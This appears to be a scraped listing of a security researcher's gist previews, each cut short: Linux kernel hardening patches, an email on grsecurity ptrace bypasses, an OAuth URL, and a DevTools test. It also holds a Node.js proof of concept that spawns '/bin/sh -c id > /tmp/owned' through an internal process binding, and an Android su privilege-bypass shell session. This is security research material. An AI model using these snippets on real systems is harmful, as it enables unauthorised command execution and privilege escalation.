This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var Process = process.binding('process_wrap').Process; | |
var proc = new Process(); | |
proc.onexit = function(a,b) {}; | |
var env = process.env; | |
var env_ = []; | |
for (var key in env) env_.push(key+'='+env[key]); | |
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001 | |
From: Jann Horn <jann@thejh.net> | |
Date: Sat, 12 Dec 2015 02:59:28 +0100 | |
Subject: [PATCH] drivers/tty: add protected_ttys sysctl | |
This new fs.protected_ttys sysctl can be set to 1 to require | |
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller | |
push input back into the TTY and thereby fake input to other | |
processes that read from the same TTY). |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var Process = process.binding('process_wrap').Process; | |
var proc = new Process(); | |
proc.onexit = function(a,b) {}; | |
var env = process.env; | |
var env_ = []; | |
for (var key in env) env_.push(key+'='+env[key]); | |
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]}); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Date: Sun, 28 Feb 2016 19:08:22 +0100 | |
From: Jann Horn <jann@thejh.net> | |
To: Brad Spengler <spender@grsecurity.net> | |
Subject: GRKERNSEC_PTRACE_READEXEC bypasses | |
Hi! | |
While writing some new kernel documentation (not yet public, but will probably | |
soon be under Documentation/security/ptrace_checks.txt), I noticed that | |
GRKERNSEC_PTRACE_READEXEC has some issues. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
From 712e7f2f67476986498dd8f1db332a62852ebdf0 Mon Sep 17 00:00:00 2001 | |
From: Jann Horn <jann@thejh.net> | |
Date: Sat, 2 Jan 2016 08:09:19 +0100 | |
Subject: [PATCH] fs: allow unprivileged chroot() | |
Allow unprivileged processes to chroot() themselves, under the | |
following conditions: | |
- The caller must have set NO_NEW_PRIVS to prevent him from | |
invoking setuid/setgid/setcap executables in the chroot that |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
From 7f1265b917aba4436653aa8e7bf90976b82b77ee Mon Sep 17 00:00:00 2001 | |
From: Jann Horn <jann@thejh.net> | |
Date: Fri, 14 Aug 2015 17:47:01 +0200 | |
Subject: [PATCH] drivers/tty: require read access for controlling terminal | |
This is mostly a hardening fix, given that write-only access to other | |
users' ttys is usually only given through setgid tty executables. | |
Signed-off-by: Jann Horn <jann@thejh.net> | |
--- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://accounts.google.com/o/oauth2/auth?client_id=243086291405-p1p6s7gq8rtijh3g9cppo85rl5pf17gv.apps.googleusercontent.com&response_type=code&scope=openid%20email&redirect_uri=https://thejh.net/&state=security_token%3D138r5719ru3e1%26url%3Dhttps://thejh.net/&prompt=none |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@android:/ # su 1000 | |
system@android:/ $ cd /tmp | |
system@android:/tmp $ cat > foo | |
/system/bin/sh | |
1 | |
rubbish | |
system@android:/tmp $ su -c "$(cat foo)" | |
# press "deny" now with "remember" option activated | |
Permission denied | |
1|system@android:/tmp $ su |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
zzzzDevToolsAPI.dispatchMessage({"method":"Network.responseReceived","params":{"requestId":"1191.4","frameId":"1191.1","loaderId":"1191.3","timestamp":125386.24326,"type":"Document","response":{"url":"http://thejh.net/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAthisisaneviltest","status":404,"statusText":"Not Found","headers":{"Date":"Tue, 14 Jul 2015 12:48:11 GMT","Cache-Control":"no-transform","Server":"lighttpd/1.4.35","Content-Length":"345","Content-Type":"text/html"},"mimeType":"text/html","connectionReused":false,"connectionId":21596,"encodedDataLength":-1,"fromDiskCache":false,"fromServiceWorker":false,"timing":{"requestTime":125386.186667,"proxyStart":-1,"proxyEnd":-1,"dnsStart":2.04599999415223,"dnsEnd":2.06400000024587,"connectStart":2.06400000024587,"connectEnd":29.9769999983255,"sslStart":-1,"sslEnd":-1,"serviceWorkerFetchStart":-1,"serviceWorkerFetchReady":-1,"serviceWorkerFetchEnd":-1,"sendStart":30.19000000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/socket.h> | |
#include <sys/un.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> |